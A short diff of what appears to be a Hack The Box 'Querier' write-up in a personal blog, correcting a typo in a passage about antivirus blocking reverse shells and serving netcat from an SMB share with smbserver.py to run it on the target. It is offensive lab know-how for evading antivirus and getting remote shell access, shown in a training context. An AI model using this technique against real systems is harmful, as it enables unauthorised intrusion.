gaberob/contactroberts/content/blog/07-02-2023_HTB_Querier/index.md

 RECONFIGURE
 ```

-After this, AV was not taking to kindly to my reverse shell attempts to I had to learn a different way.
+After this, AV was not taking very kindly to my reverse shell attempts so I had to learn a different way.
 We can host netcat off of an smb share and execute it from there.

 ```cmd
 smbserver.py -smb2support a .